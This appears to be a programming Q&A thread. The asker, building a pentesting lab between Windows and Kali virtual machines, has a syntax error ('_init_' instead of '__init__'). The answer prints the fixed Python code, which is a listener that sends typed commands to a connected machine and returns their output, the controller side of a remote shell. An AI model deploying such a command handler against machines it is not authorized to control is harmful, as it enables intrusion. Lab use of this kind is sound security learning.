# How to fix a "invalid syntax" error in my Python code?

Tags: python

I am coding for pentesting purposes. I am trying to establish a connection between my Windows Virtual Machine and my Kali Linux virtual machine. I have coded a listener for this purpose but it is not working.

My Python code:

[image]

The result from running the listener on Kali Linux:

[image]

Comment: Please post your code directly in the question. See [this link](https://meta.stackoverflow.com/questions/303812/discourage-screenshots-of-code-and-or-errors) for why screenshots of code are not very helpful.

Comment: It's `__init__` not `_init_`.

Comment: Sorry @AndroidNoobie, I will copy and paste my code into the question.

Comment: Thank you so much, Klaus! Will edit that right away.

Comment: Thank you so much, its working now! What a stupid mistake, I can't believe I didn't notice that.

Answer (score 1):

@Klaus D. is right, your `__init__` needed two underscores on each side, not 1. Also a good idea to make sure the methods under your class are properly indented.

```
#!/usr/bin/python

import socket

class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("Waiting for connections....")
        self.connection, address = listener.accept()
        print("Got a connection from " + str(address))

    def execute_remotely(self, command):
        self.connection.send(command)
        return self.connection.recv(1024)

    def run(self):
        while True:
            command = raw_input(">>")
            result = self.execute_remotely(command)
            print(result)

myListener = Listener("10.0.2.15", 8080)
myListener.run()
```